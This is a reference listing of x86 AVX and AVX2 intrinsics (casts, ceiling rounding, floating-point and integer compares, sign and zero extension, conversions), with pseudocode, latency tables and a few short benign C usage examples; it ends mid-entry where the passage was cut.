__m256i _mm256_castpd_si256 (__m256d a)

Synopsis

__m256i _mm256_castpd_si256 (__m256d a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m256d to type __m256i. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m256d _mm256_castpd128_pd256 (__m128d a)

Synopsis

__m256d _mm256_castpd128_pd256 (__m128d a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m128d to type __m256d; the upper 128 bits of the result are undefined. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m128d _mm256_castpd256_pd128 (__m256d a)

Synopsis

__m128d _mm256_castpd256_pd128 (__m256d a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m256d to type __m128d. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m256d _mm256_castps_pd (__m256 a)

Synopsis

__m256d _mm256_castps_pd (__m256 a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Cast vector of type __m256 to type __m256d. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m256i _mm256_castps_si256 (__m256 a)

Synopsis

__m256i _mm256_castps_si256 (__m256 a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m256 to type __m256i. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m256 _mm256_castps128_ps256 (__m128 a)

Synopsis

__m256 _mm256_castps128_ps256 (__m128 a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m128 to type __m256; the upper 128 bits of the result are undefined. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m128 _mm256_castps256_ps128 (__m256 a)

Synopsis

__m128 _mm256_castps256_ps128 (__m256 a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m256 to type __m128. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m256i _mm256_castsi128_si256 (__m128i a)

Synopsis

__m256i _mm256_castsi128_si256 (__m128i a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m128i to type __m256i; the upper 128 bits of the result are undefined. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m256d _mm256_castsi256_pd (__m256i a)

Synopsis

__m256d _mm256_castsi256_pd (__m256i a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m256i to type __m256d. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m256 _mm256_castsi256_ps (__m256i a)

Synopsis

__m256 _mm256_castsi256_ps (__m256i a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m256i to type __m256. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
__m128i _mm256_castsi256_si128 (__m256i a)

Synopsis

__m128i _mm256_castsi256_si128 (__m256i a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Casts vector of type __m256i to type __m128i. This intrinsic is only used for compilation and does not generate any instructions, thus it has zero latency.
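
Because the cast intrinsics are free, they are often used to do integer bit manipulation on floating-point data. A sketch that isolates the sign bits of a float vector (the 0x80000000 mask is just an illustrative constant; built with -mavx2 for the integer AND):

#include <immintrin.h>
#include <stdio.h>

int main(void)
{
    __m256  f    = _mm256_set1_ps(-1.0f);
    __m256i bits = _mm256_castps_si256(f);                 /* reinterpret, no instruction */
    __m256i sign = _mm256_and_si256(bits,                  /* keep only the sign bits     */
                                    _mm256_set1_epi32((int)0x80000000));
    __m256  back = _mm256_castsi256_ps(sign);              /* reinterpret again, also free */

    float out[8];
    _mm256_storeu_ps(out, back);
    printf("%f\n", out[0]);                                /* -0.000000 */
    return 0;
}
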
vroundpd
__m256d _mm256_ceil_pd (__m256d a)

Synopsis

__m256d _mm256_ceil_pd (__m256d a)
#include «immintrin.h»
Instruction: vroundpd ymm, ymm, imm
CPUID Flags: AVX

Description

Round the packed double-precision (64-bit) floating-point elements in a up to an integer value, and store the results as packed double-precision floating-point elements in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := CEIL(a[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vroundps
__m256 _mm256_ceil_ps (__m256 a)

Synopsis

__m256 _mm256_ceil_ps (__m256 a)
#include «immintrin.h»
Instruction: vroundps ymm, ymm, imm
CPUID Flags: AVX

Description

Round the packed single-precision (32-bit) floating-point elements in a up to an integer value, and store the results as packed single-precision floating-point elements in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := CEIL(a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vcmppd
__m128d _mm_cmp_pd (__m128d a, __m128d b, const int imm8)

Synopsis

__m128d _mm_cmp_pd (__m128d a, __m128d b, const int imm8)
#include «immintrin.h»
Instruction: vcmppd xmm, xmm, xmm, imm
CPUID Flags: AVX

Description

Compare packed double-precision (64-bit) floating-point elements in a and b based on the comparison operand specified by imm8, and store the results in dst.

Operation

CASE (imm8[7:0]) OF 0: OP := _CMP_EQ_OQ 1: OP := _CMP_LT_OS 2: OP := _CMP_LE_OS 3: OP := _CMP_UNORD_Q 4: OP := _CMP_NEQ_UQ 5: OP := _CMP_NLT_US 6: OP := _CMP_NLE_US 7: OP := _CMP_ORD_Q 8: OP := _CMP_EQ_UQ 9: OP := _CMP_NGE_US 10: OP := _CMP_NGT_US 11: OP := _CMP_FALSE_OQ 12: OP := _CMP_NEQ_OQ 13: OP := _CMP_GE_OS 14: OP := _CMP_GT_OS 15: OP := _CMP_TRUE_UQ 16: OP := _CMP_EQ_OS 17: OP := _CMP_LT_OQ 18: OP := _CMP_LE_OQ 19: OP := _CMP_UNORD_S 20: OP := _CMP_NEQ_US 21: OP := _CMP_NLT_UQ 22: OP := _CMP_NLE_UQ 23: OP := _CMP_ORD_S 24: OP := _CMP_EQ_US 25: OP := _CMP_NGE_UQ 26: OP := _CMP_NGT_UQ 27: OP := _CMP_FALSE_OS 28: OP := _CMP_NEQ_OS 29: OP := _CMP_GE_OQ 30: OP := _CMP_GT_OQ 31: OP := _CMP_TRUE_US ESAC FOR j := 0 to 1 i := j*64 dst[i+63:i] := ( a[i+63:i] OP b[i+63:i] ) ? 0xFFFFFFFFFFFFFFFF : 0 ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 3
Sandy Bridge 3
vcmppd
__m256d _mm256_cmp_pd (__m256d a, __m256d b, const int imm8)

Synopsis

__m256d _mm256_cmp_pd (__m256d a, __m256d b, const int imm8)
#include «immintrin.h»
Instruction: vcmppd ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Compare packed double-precision (64-bit) floating-point elements in a and b based on the comparison operand specified by imm8, and store the results in dst.

Operation

CASE (imm8[7:0]) OF 0: OP := _CMP_EQ_OQ 1: OP := _CMP_LT_OS 2: OP := _CMP_LE_OS 3: OP := _CMP_UNORD_Q 4: OP := _CMP_NEQ_UQ 5: OP := _CMP_NLT_US 6: OP := _CMP_NLE_US 7: OP := _CMP_ORD_Q 8: OP := _CMP_EQ_UQ 9: OP := _CMP_NGE_US 10: OP := _CMP_NGT_US 11: OP := _CMP_FALSE_OQ 12: OP := _CMP_NEQ_OQ 13: OP := _CMP_GE_OS 14: OP := _CMP_GT_OS 15: OP := _CMP_TRUE_UQ 16: OP := _CMP_EQ_OS 17: OP := _CMP_LT_OQ 18: OP := _CMP_LE_OQ 19: OP := _CMP_UNORD_S 20: OP := _CMP_NEQ_US 21: OP := _CMP_NLT_UQ 22: OP := _CMP_NLE_UQ 23: OP := _CMP_ORD_S 24: OP := _CMP_EQ_US 25: OP := _CMP_NGE_UQ 26: OP := _CMP_NGT_UQ 27: OP := _CMP_FALSE_OS 28: OP := _CMP_NEQ_OS 29: OP := _CMP_GE_OQ 30: OP := _CMP_GT_OQ 31: OP := _CMP_TRUE_US ESAC FOR j := 0 to 3 i := j*64 dst[i+63:i] := ( a[i+63:i] OP b[i+63:i] ) ? 0xFFFFFFFFFFFFFFFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vcmpps
__m128 _mm_cmp_ps (__m128 a, __m128 b, const int imm8)

Synopsis

__m128 _mm_cmp_ps (__m128 a, __m128 b, const int imm8)
#include «immintrin.h»
Instruction: vcmpps xmm, xmm, xmm, imm
CPUID Flags: AVX

Description

Compare packed single-precision (32-bit) floating-point elements in a and b based on the comparison operand specified by imm8, and store the results in dst.

Operation

CASE (imm8[7:0]) OF 0: OP := _CMP_EQ_OQ 1: OP := _CMP_LT_OS 2: OP := _CMP_LE_OS 3: OP := _CMP_UNORD_Q 4: OP := _CMP_NEQ_UQ 5: OP := _CMP_NLT_US 6: OP := _CMP_NLE_US 7: OP := _CMP_ORD_Q 8: OP := _CMP_EQ_UQ 9: OP := _CMP_NGE_US 10: OP := _CMP_NGT_US 11: OP := _CMP_FALSE_OQ 12: OP := _CMP_NEQ_OQ 13: OP := _CMP_GE_OS 14: OP := _CMP_GT_OS 15: OP := _CMP_TRUE_UQ 16: OP := _CMP_EQ_OS 17: OP := _CMP_LT_OQ 18: OP := _CMP_LE_OQ 19: OP := _CMP_UNORD_S 20: OP := _CMP_NEQ_US 21: OP := _CMP_NLT_UQ 22: OP := _CMP_NLE_UQ 23: OP := _CMP_ORD_S 24: OP := _CMP_EQ_US 25: OP := _CMP_NGE_UQ 26: OP := _CMP_NGT_UQ 27: OP := _CMP_FALSE_OS 28: OP := _CMP_NEQ_OS 29: OP := _CMP_GE_OQ 30: OP := _CMP_GT_OQ 31: OP := _CMP_TRUE_US ESAC FOR j := 0 to 3 i := j*32 dst[i+31:i] := ( a[i+31:i] OP b[i+31:i] ) ? 0xFFFFFFFF : 0 ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 3
Sandy Bridge 3
vcmpps
__m256 _mm256_cmp_ps (__m256 a, __m256 b, const int imm8)

Synopsis

__m256 _mm256_cmp_ps (__m256 a, __m256 b, const int imm8)
#include «immintrin.h»
Instruction: vcmpps ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Compare packed single-precision (32-bit) floating-point elements in a and b based on the comparison operand specified by imm8, and store the results in dst.

Operation

CASE (imm8[7:0]) OF 0: OP := _CMP_EQ_OQ 1: OP := _CMP_LT_OS 2: OP := _CMP_LE_OS 3: OP := _CMP_UNORD_Q 4: OP := _CMP_NEQ_UQ 5: OP := _CMP_NLT_US 6: OP := _CMP_NLE_US 7: OP := _CMP_ORD_Q 8: OP := _CMP_EQ_UQ 9: OP := _CMP_NGE_US 10: OP := _CMP_NGT_US 11: OP := _CMP_FALSE_OQ 12: OP := _CMP_NEQ_OQ 13: OP := _CMP_GE_OS 14: OP := _CMP_GT_OS 15: OP := _CMP_TRUE_UQ 16: OP := _CMP_EQ_OS 17: OP := _CMP_LT_OQ 18: OP := _CMP_LE_OQ 19: OP := _CMP_UNORD_S 20: OP := _CMP_NEQ_US 21: OP := _CMP_NLT_UQ 22: OP := _CMP_NLE_UQ 23: OP := _CMP_ORD_S 24: OP := _CMP_EQ_US 25: OP := _CMP_NGE_UQ 26: OP := _CMP_NGT_UQ 27: OP := _CMP_FALSE_OS 28: OP := _CMP_NEQ_OS 29: OP := _CMP_GE_OQ 30: OP := _CMP_GT_OQ 31: OP := _CMP_TRUE_US ESAC FOR j := 0 to 7 i := j*32 dst[i+31:i] := ( a[i+31:i] OP b[i+31:i] ) ? 0xFFFFFFFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
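
vcmpps produces an all-ones/all-zero mask per lane, which is usually either fed into a blend or compressed into a bitmask. A sketch counting lanes above a threshold (_mm256_movemask_ps is a standard AVX intrinsic and __builtin_popcount a GCC/Clang builtin, neither listed in this excerpt):

#include <immintrin.h>
#include <stdio.h>

int main(void)
{
    __m256 x   = _mm256_setr_ps(0.5f, 1.5f, 2.5f, 0.1f, 3.0f, 0.9f, 1.1f, 4.0f);
    __m256 thr = _mm256_set1_ps(1.0f);

    __m256 gt   = _mm256_cmp_ps(x, thr, _CMP_GT_OQ);   /* all-ones where x > 1.0 */
    int    bits = _mm256_movemask_ps(gt);               /* one bit per lane       */

    printf("lanes > 1.0: mask=0x%02X count=%d\n",
           (unsigned)bits, __builtin_popcount(bits));    /* mask=0xD6 count=5 */
    return 0;
}
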
vcmpsd
__m128d _mm_cmp_sd (__m128d a, __m128d b, const int imm8)

Synopsis

__m128d _mm_cmp_sd (__m128d a, __m128d b, const int imm8)
#include «immintrin.h»
Instruction: vcmpsd xmm, xmm, xmm, imm
CPUID Flags: AVX

Description

Compare the lower double-precision (64-bit) floating-point element in a and b based on the comparison operand specified by imm8, store the result in the lower element of dst, and copy the upper element from a to the upper element of dst.

Operation

CASE (imm8[7:0]) OF 0: OP := _CMP_EQ_OQ 1: OP := _CMP_LT_OS 2: OP := _CMP_LE_OS 3: OP := _CMP_UNORD_Q 4: OP := _CMP_NEQ_UQ 5: OP := _CMP_NLT_US 6: OP := _CMP_NLE_US 7: OP := _CMP_ORD_Q 8: OP := _CMP_EQ_UQ 9: OP := _CMP_NGE_US 10: OP := _CMP_NGT_US 11: OP := _CMP_FALSE_OQ 12: OP := _CMP_NEQ_OQ 13: OP := _CMP_GE_OS 14: OP := _CMP_GT_OS 15: OP := _CMP_TRUE_UQ 16: OP := _CMP_EQ_OS 17: OP := _CMP_LT_OQ 18: OP := _CMP_LE_OQ 19: OP := _CMP_UNORD_S 20: OP := _CMP_NEQ_US 21: OP := _CMP_NLT_UQ 22: OP := _CMP_NLE_UQ 23: OP := _CMP_ORD_S 24: OP := _CMP_EQ_US 25: OP := _CMP_NGE_UQ 26: OP := _CMP_NGT_UQ 27: OP := _CMP_FALSE_OS 28: OP := _CMP_NEQ_OS 29: OP := _CMP_GE_OQ 30: OP := _CMP_GT_OQ 31: OP := _CMP_TRUE_US ESAC dst[63:0] := ( a[63:0] OP b[63:0] ) ? 0xFFFFFFFFFFFFFFFF : 0 dst[127:64] := a[127:64] dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 3
Sandy Bridge 3
vcmpss
__m128 _mm_cmp_ss (__m128 a, __m128 b, const int imm8)

Synopsis

__m128 _mm_cmp_ss (__m128 a, __m128 b, const int imm8)
#include «immintrin.h»
Instruction: vcmpss xmm, xmm, xmm, imm
CPUID Flags: AVX

Description

Compare the lower single-precision (32-bit) floating-point element in a and b based on the comparison operand specified by imm8, store the result in the lower element of dst, and copy the upper 3 packed elements from a to the upper elements of dst.

Operation

CASE (imm8[7:0]) OF 0: OP := _CMP_EQ_OQ 1: OP := _CMP_LT_OS 2: OP := _CMP_LE_OS 3: OP := _CMP_UNORD_Q 4: OP := _CMP_NEQ_UQ 5: OP := _CMP_NLT_US 6: OP := _CMP_NLE_US 7: OP := _CMP_ORD_Q 8: OP := _CMP_EQ_UQ 9: OP := _CMP_NGE_US 10: OP := _CMP_NGT_US 11: OP := _CMP_FALSE_OQ 12: OP := _CMP_NEQ_OQ 13: OP := _CMP_GE_OS 14: OP := _CMP_GT_OS 15: OP := _CMP_TRUE_UQ 16: OP := _CMP_EQ_OS 17: OP := _CMP_LT_OQ 18: OP := _CMP_LE_OQ 19: OP := _CMP_UNORD_S 20: OP := _CMP_NEQ_US 21: OP := _CMP_NLT_UQ 22: OP := _CMP_NLE_UQ 23: OP := _CMP_ORD_S 24: OP := _CMP_EQ_US 25: OP := _CMP_NGE_UQ 26: OP := _CMP_NGT_UQ 27: OP := _CMP_FALSE_OS 28: OP := _CMP_NEQ_OS 29: OP := _CMP_GE_OQ 30: OP := _CMP_GT_OQ 31: OP := _CMP_TRUE_US ESAC dst[31:0] := ( a[31:0] OP b[31:0] ) ? 0xFFFFFFFF : 0 dst[127:32] := a[127:32] dst[MAX:128] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 3
Sandy Bridge 3
vpcmpeqw
__m256i _mm256_cmpeq_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_cmpeq_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpcmpeqw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 16-bit integers in a and b for equality, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := ( a[i+15:i] == b[i+15:i] ) ? 0xFFFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpcmpeqd
__m256i _mm256_cmpeq_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_cmpeq_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpcmpeqd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 32-bit integers in a and b for equality, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := ( a[i+31:i] == b[i+31:i] ) ? 0xFFFFFFFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpcmpeqq
__m256i _mm256_cmpeq_epi64 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_cmpeq_epi64 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpcmpeqq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 64-bit integers in a and b for equality, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := ( a[i+63:i] == b[i+63:i] ) ? 0xFFFFFFFFFFFFFFFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpcmpeqb
__m256i _mm256_cmpeq_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_cmpeq_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpcmpeqb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 8-bit integers in a and b for equality, and store the results in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := ( a[i+7:i] == b[i+7:i] ) ? 0xFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
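
The byte-equality compare plus a movemask is the core of most SIMD byte-search loops. A sketch that locates a character in one 32-byte block (_mm256_movemask_epi8 and the GCC/Clang builtin __builtin_ctz are assumptions outside this excerpt):

#include <immintrin.h>
#include <stdio.h>

int main(void)
{
    const char buf[32] = "find the x in this buffer.....";
    __m256i chunk  = _mm256_loadu_si256((const __m256i *)buf);
    __m256i needle = _mm256_set1_epi8('x');

    __m256i  eq   = _mm256_cmpeq_epi8(chunk, needle);       /* 0xFF where bytes match */
    unsigned mask = (unsigned)_mm256_movemask_epi8(eq);      /* one bit per byte       */

    if (mask)
        printf("'x' found at offset %d\n", __builtin_ctz(mask));   /* offset 9 */
    else
        printf("'x' not found in this 32-byte block\n");
    return 0;
}
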
vpcmpgtw
__m256i _mm256_cmpgt_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_cmpgt_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpcmpgtw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 16-bit integers in a and b for greater-than, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := ( a[i+15:i] > b[i+15:i] ) ? 0xFFFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpcmpgtd
__m256i _mm256_cmpgt_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_cmpgt_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpcmpgtd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 32-bit integers in a and b for greater-than, and store the results in dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := ( a[i+31:i] > b[i+31:i] ) ? 0xFFFFFFFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpcmpgtq
__m256i _mm256_cmpgt_epi64 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_cmpgt_epi64 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpcmpgtq ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 64-bit integers in a and b for greater-than, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := ( a[i+63:i] > b[i+63:i] ) ? 0xFFFFFFFFFFFFFFFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 1
vpcmpgtb
__m256i _mm256_cmpgt_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_cmpgt_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpcmpgtb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compare packed 8-bit integers in a and b for greater-than, and store the results in dst.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := ( a[i+7:i] > b[i+7:i] ) ? 0xFF : 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpmovsxwd
__m256i _mm256_cvtepi16_epi32 (__m128i a)

Synopsis

__m256i _mm256_cvtepi16_epi32 (__m128i a)
#include «immintrin.h»
Instruction: vpmovsxwd ymm, xmm
CPUID Flags: AVX2

Description

Sign extend packed 16-bit integers in a to packed 32-bit integers, and store the results in dst.

Operation

FOR j:= 0 to 7 i := 32*j k := 16*j dst[i+31:i] := SignExtend(a[k+15:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovsxwq
__m256i _mm256_cvtepi16_epi64 (__m128i a)

Synopsis

__m256i _mm256_cvtepi16_epi64 (__m128i a)
#include «immintrin.h»
Instruction: vpmovsxwq ymm, xmm
CPUID Flags: AVX2

Description

Sign extend packed 16-bit integers in a to packed 64-bit integers, and store the results in dst.

Operation

FOR j:= 0 to 3 i := 64*j k := 16*j dst[i+63:i] := SignExtend(a[k+15:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovsxdq
__m256i _mm256_cvtepi32_epi64 (__m128i a)

Synopsis

__m256i _mm256_cvtepi32_epi64 (__m128i a)
#include «immintrin.h»
Instruction: vpmovsxdq ymm, xmm
CPUID Flags: AVX2

Description

Sign extend packed 32-bit integers in a to packed 64-bit integers, and store the results in dst.

Operation

FOR j:= 0 to 3 i := 64*j k := 32*j dst[i+63:i] := SignExtend(a[k+31:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vcvtdq2pd
__m256d _mm256_cvtepi32_pd (__m128i a)

Synopsis

__m256d _mm256_cvtepi32_pd (__m128i a)
#include «immintrin.h»
Instruction: vcvtdq2pd ymm, xmm
CPUID Flags: AVX

Description

Convert packed 32-bit integers in a to packed double-precision (64-bit) floating-point elements, and store the results in dst.

Operation

FOR j := 0 to 3 i := j*32 m := j*64 dst[m+63:m] := Convert_Int32_To_FP64(a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 4 1
Ivy Bridge 4 1
Sandy Bridge 4 1
vcvtdq2ps
__m256 _mm256_cvtepi32_ps (__m256i a)

Synopsis

__m256 _mm256_cvtepi32_ps (__m256i a)
#include «immintrin.h»
Instruction: vcvtdq2ps ymm, ymm
CPUID Flags: AVX

Description

Convert packed 32-bit integers in a to packed single-precision (32-bit) floating-point elements, and store the results in dst.

Operation

FOR j := 0 to 7 i := 32*j dst[i+31:i] := Convert_Int32_To_FP32(a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vpmovsxbw
__m256i _mm256_cvtepi8_epi16 (__m128i a)

Synopsis

__m256i _mm256_cvtepi8_epi16 (__m128i a)
#include «immintrin.h»
Instruction: vpmovsxbw ymm, xmm
CPUID Flags: AVX2

Description

Sign extend packed 8-bit integers in a to packed 16-bit integers, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*8 l := j*16 dst[l+15:l] := SignExtend(a[i+7:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovsxbd
__m256i _mm256_cvtepi8_epi32 (__m128i a)

Synopsis

__m256i _mm256_cvtepi8_epi32 (__m128i a)
#include «immintrin.h»
Instruction: vpmovsxbd ymm, xmm
CPUID Flags: AVX2

Description

Sign extend packed 8-bit integers in a to packed 32-bit integers, and store the results in dst.

Operation

FOR j := 0 to 7 i := 32*j k := 8*j dst[i+31:i] := SignExtend(a[k+7:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovsxbq
__m256i _mm256_cvtepi8_epi64 (__m128i a)

Synopsis

__m256i _mm256_cvtepi8_epi64 (__m128i a)
#include «immintrin.h»
Instruction: vpmovsxbq ymm, xmm
CPUID Flags: AVX2

Description

Sign extend packed 8-bit integers in the low 8 bytes of a to packed 64-bit integers, and store the results in dst.

Operation

FOR j := 0 to 3 i := 64*j k := 8*j dst[i+63:i] := SignExtend(a[k+7:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovzxwd
__m256i _mm256_cvtepu16_epi32 (__m128i a)

Synopsis

__m256i _mm256_cvtepu16_epi32 (__m128i a)
#include «immintrin.h»
Instruction: vpmovzxwd ymm, xmm
CPUID Flags: AVX2

Description

Zero extend packed unsigned 16-bit integers in a to packed 32-bit integers, and store the results in dst.

Operation

FOR j := 0 to 7 i := 32*j k := 16*j dst[i+31:i] := ZeroExtend(a[k+15:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovzxwq
__m256i _mm256_cvtepu16_epi64 (__m128i a)

Synopsis

__m256i _mm256_cvtepu16_epi64 (__m128i a)
#include «immintrin.h»
Instruction: vpmovzxwq ymm, xmm
CPUID Flags: AVX2

Description

Zero extend packed unsigned 16-bit integers in a to packed 64-bit integers, and store the results in dst.

Operation

FOR j:= 0 to 3 i := 64*j k := 16*j dst[i+63:i] := ZeroExtend(a[k+15:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovzxdq
__m256i _mm256_cvtepu32_epi64 (__m128i a)

Synopsis

__m256i _mm256_cvtepu32_epi64 (__m128i a)
#include «immintrin.h»
Instruction: vpmovzxdq ymm, xmm
CPUID Flags: AVX2

Description

Zero extend packed unsigned 32-bit integers in a to packed 64-bit integers, and store the results in dst.

Operation

FOR j:= 0 to 3 i := 64*j k := 32*j dst[i+63:i] := ZeroExtend(a[k+31:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovzxbw
__m256i _mm256_cvtepu8_epi16 (__m128i a)

Synopsis

__m256i _mm256_cvtepu8_epi16 (__m128i a)
#include «immintrin.h»
Instruction: vpmovzxbw ymm, xmm
CPUID Flags: AVX2

Description

Zero extend packed unsigned 8-bit integers in a to packed 16-bit integers, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*8 l := j*16 dst[l+15:l] := ZeroExtend(a[i+7:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovzxbd
__m256i _mm256_cvtepu8_epi32 (__m128i a)

Synopsis

__m256i _mm256_cvtepu8_epi32 (__m128i a)
#include «immintrin.h»
Instruction: vpmovzxbd ymm, xmm
CPUID Flags: AVX2

Description

Zero extend packed unsigned 8-bit integers in a to packed 32-bit integers, and store the results in dst.

Operation

FOR j := 0 to 7 i := 32*j k := 8*j dst[i+31:i] := ZeroExtend(a[k+7:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
vpmovzxbq
__m256i _mm256_cvtepu8_epi64 (__m128i a)

Synopsis

__m256i _mm256_cvtepu8_epi64 (__m128i a)
#include «immintrin.h»
Instruction: vpmovzxbq ymm, xmm
CPUID Flags: AVX2

Description

Zero extend packed unsigned 8-bit integers in the low 8 bytes of a to packed 64-bit integers, and store the results in dst.

Operation

FOR j := 0 to 3 i := 64*j k := 8*j dst[i+63:i] := ZeroExtend(a[k+7:k]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
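
The vpmovzx/vpmovsx family widens narrow integers in one step, which avoids manual unpacking. A sketch widening 16 unsigned bytes to 16-bit integers, e.g. pixel data that needs arithmetic headroom (_mm_loadu_si128 is a standard SSE2 intrinsic not listed here):

#include <immintrin.h>
#include <stdio.h>

int main(void)
{
    unsigned char pixels[16] = {0, 16, 32, 64, 96, 128, 160, 200,
                                255, 1, 2, 3, 4, 5, 6, 7};
    short widened[16];

    __m128i src = _mm_loadu_si128((const __m128i *)pixels);
    __m256i w16 = _mm256_cvtepu8_epi16(src);          /* vpmovzxbw: 16 x u8 -> 16 x i16 */
    _mm256_storeu_si256((__m256i *)widened, w16);

    printf("%d %d %d\n", widened[0], widened[7], widened[8]);   /* 0 200 255 */
    return 0;
}
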
vcvtpd2dq
__m128i _mm256_cvtpd_epi32 (__m256d a)

Synopsis

__m128i _mm256_cvtpd_epi32 (__m256d a)
#include «immintrin.h»
Instruction: vcvtpd2dq xmm, ymm
CPUID Flags: AVX

Description

Convert packed double-precision (64-bit) floating-point elements in a to packed 32-bit integers, and store the results in dst.

Operation

FOR j := 0 to 3 i := 32*j k := 64*j dst[i+31:i] := Convert_FP64_To_Int32(a[k+63:k]) ENDFOR dst[MAX:128] := 0

Performance

Architecture Latency Throughput
